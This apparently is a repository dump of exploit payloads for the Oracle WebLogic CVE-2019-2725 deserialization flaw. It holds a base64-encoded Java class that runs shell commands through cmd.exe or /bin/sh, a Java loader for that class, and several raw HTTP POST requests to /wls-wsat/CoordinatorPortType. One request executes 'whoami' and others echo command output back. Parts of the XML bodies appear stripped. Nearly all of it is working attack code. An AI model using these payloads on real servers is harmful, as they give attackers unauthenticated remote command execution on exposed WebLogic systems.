"yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7"; 31 | sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); 32 | byte[] bt = decoder.decodeBuffer(R); 33 | 34 | org.mozilla.classfile.DefiningClassLoader cls = new org.mozilla.classfile.DefiningClassLoader(); 35 | Class cl = cls.defineClass("ResultBaseExec",bt); 36 | 37 | //这里使用String.class,非数组形式,可能会有问题,比如在改JDK7u21执行代码时候。 38 | // java.lang.reflect.Method m = cl.getMethod("do_exec",String.class); 39 | // m.invoke(cl.newInstance(),"calc"); 40 | 41 | Object object = cl.newInstance().getClass().getMethod("do_exec", new Class[]{String.class}).invoke(cl.newInstance(),new Object[]{"calc"}); 42 | return object; 43 | } 44 | 45 | public static void main(final String[] args) throws Exception { 46 | //do_exec("calc"); 47 | System.out.println(test_code("echo 1111")); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /weblogic-2019-2725-12.1.3回显检测.txt: -------------------------------------------------------------------------------- 1 | POST /wls-wsat/CoordinatorPortType HTTP/1.1 2 | Host: 127.0.0.1:7001 3 | Upgrade-Insecure-Requests: 1 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 6 | Accept-Encoding: gzip, deflate 7 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 8 | Connection: close 9 | Content-Type: text/xml 10 | Content-Length: 1497 11 | 12 | xxxx 13 | 14 | org.slf4j.ext.EventData 15 | 16 | 17 | 19 | 20 | 21 | 22 | 23 | connectionHandler 24 | true 25 | 26 | 27 | 28 | 29 | 30 | 31 | lufei test 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | ]]> 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /weblogic-2019-2725_10.3.6回显检测.txt: -------------------------------------------------------------------------------- 1 | POST /wls-wsat/CoordinatorPortType HTTP/1.1 2 | Host: 127.0.0.1:7001 3 | Content-Length: 128966 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | content-type: text/xml 7 | 8 | xxxx 9 | oracle.toplink.internal.sessions.UnitOfWorkChangeSet 10 | -84-195115114231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423021201141710697118974611711610510846729711510483101116-7068-123-107-106-72-7352312011211912166364211511458991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-8551377313951051101001011101167811710998101114731495116114971101151081011167311010010112076119597117120671089711511510111511659769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014772971151041169798108101599110959812111610199111100101115116391916691695991089711511511618917610697118974710897110103476710897115115597659511097109101116187610697118974710897110103478311611410511010359761795111117116112117116801141111121011141161051011151162276106971189747117116105108478011411111210111411610510111559120112-1-1-1-1112117114391916675-32521103103-37552120112211711429166-84-1323-86884-322120112918-54-2-70-6650961033479473773811611510111410597108861011141151051111108573681174113671111101151169711011686971081171015-8332-109-13-111-35-17621660105110105116621340418614671111001011157610511010178117109981011148497981081011187611199971088697114105979810810184979810810114116104105115119831161179884114971101151081011168097121108111971001127311011010111467108971151151011151377674687555117504947719710010310111611536831161179884114971101151081011168097121108111971005919116114971101151021111141091114407699111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994768797759917699111109471151171104711111410347971129799104101471201091084710511011610111411097108471151011141059710810512210111447831011141059710810512297116105111110729711010010810111459418618100111991171091011101161457699111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994768797759181049711010010810111411516691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145911069120991011121161051111101157391-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861810511610111497116111114153769911110947115117110471111141034797112979910410147120109108471051101161011141109710847100116109476884776512010511573116101114971161111145917104971101001081011141657699111109471151171104711111410347971129799104101471201091084710511011610111411097108471151011141059710810512210111447831011141059710810512297116105111110729711010010810111459110831111171149910170105108101133746875551175049461069711897321021141111093273110112117116701051081017998106101991161210117401357468755511750494771971001031011161153683116117988411497110115108101116809712110811197100164991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947114117110116105109101476598115116114979911684114971101151081011161201069711897471051114783101114105971081051229798108101157991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947841149711011510810111669120991011121161051111101157468755511750494771971001031011161151860991081051101051166211610697118974710897110103478410411410197100742113991171141141011101168410411410197100120404176106971189747108971101034784104114101971005912444510434612711910198108111103105994711911111410747691201019911711610184104114101971007481141031011166711711411410111011687111114107129404176119101981081111031059947119111114107478711111410765100971121161011145912505110495214411910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116821011131171011151167310911210875411110310111682101115112111110115101149404176119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011168210111511211111011510173109112108591256571055581451191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111682101115112111110115101731091121087601221031011168310111411810810111679117116112117116831161141019710915340417611910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116791171161121171168311611410197109731091121085912626310616413511910198108111103105994712010910847117116105108478311611410511010373110112117116831161141019710976612711610111511632119101981081111051039932991181019550484957955055505386812140761069711897471089711010347831161141051101035941861210701067711491191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111679117116112117116831161141019710973109112108773111119114105116101831161141019710912440761069711897471051114773110112117116831161141019710959418612757610747715102108117115104127911107480191031011168711410511610111412340417610697118974710511147801141051101168711410511610111459128283106184188611910697118974710511147801141051101168711410511610111478815119114105116101129070108991113831169799107779711284979810810113012111511111510111410597108478011911010111449545452555757565757544951495513276121115111115101114105971084780119110101114495454525557575657575449514955593323141265617284110111124711542-731-7921361911412151595119202126331-7921361941432311595121221123242254126119272127341-792136197144241159512122112829213031325412684111112745453-893176-7247-6449-7453-6455-74597744-74657845-6967891869-7372-747845-748144-74851887-7492-7919331323223317101235169117113126121-71-54-2-70-6650271032172372472511611510111410597108861011141151051111108573681174113671111101151169711011686971081171015113-26105-186010971241660105110105116621340418614671111001011157610511010178117109981011148497981081011187611199971088697114105979810810184979810810114116104105115137011111111273110110101114671089711511510111512176746875551175049477197100103101116115367011111159110831111171149910170105108101133746875551175049461069711897321021141111093273110112117116701051081017998106101991161210117261197468755511750494771971001031011161153670111111116106971189747108971101034779981061019911612010697118974710511147831011141059710810512297981081011157468755511750494771971001031011161153323141265617281110111124711542-731-792136110114121515182192201710122216911211648011911011411211911201151252291069711897120461201091084611611497110115102111114109468410110911210897116101115201069711897461051114683101114105971081051229798108101120114231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-5321761104116377610697118974710897110103471141011021081019911647731101181119997116105111110729711010010810111459120112115114501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912276121091011099810111486971081171011151161576106971189747117116105108477797112597641161211121011161776106971189747108971101034767108971151155912011211511417106971189746117116105108467297115104779711257-38-63-612296-473270101081119710070979911611111473911610411410111510411110810012011263641211981611168102539753975448561131269120118114291069711897120461201091084611611497110115102111114109468410110911210897116101115120112120 11 | -------------------------------------------------------------------------------- /weblogic-2019-2725_12.1.3命令执行.txt: -------------------------------------------------------------------------------- 1 | POST /wls-wsat/CoordinatorPortType HTTP/1.1 2 | Host: 127.0.0.1:7001 3 | Upgrade-Insecure-Requests: 1 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 6 | Accept-Encoding: gzip, deflate 7 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 8 | Connection: close 9 | Content-Type: text/xml 10 | Content-Length: 4143 11 | 12 | xxxx 13 | 14 | org.slf4j.ext.EventData 15 | 16 | 17 | 19 | 20 | yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7 21 | 22 | 23 | 24 | 25 | ResultBaseExec 26 | 27 | 28 | 29 | whoami 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | connectionHandler 40 | true 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | ]]> 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | --------------------------------------------------------------------------------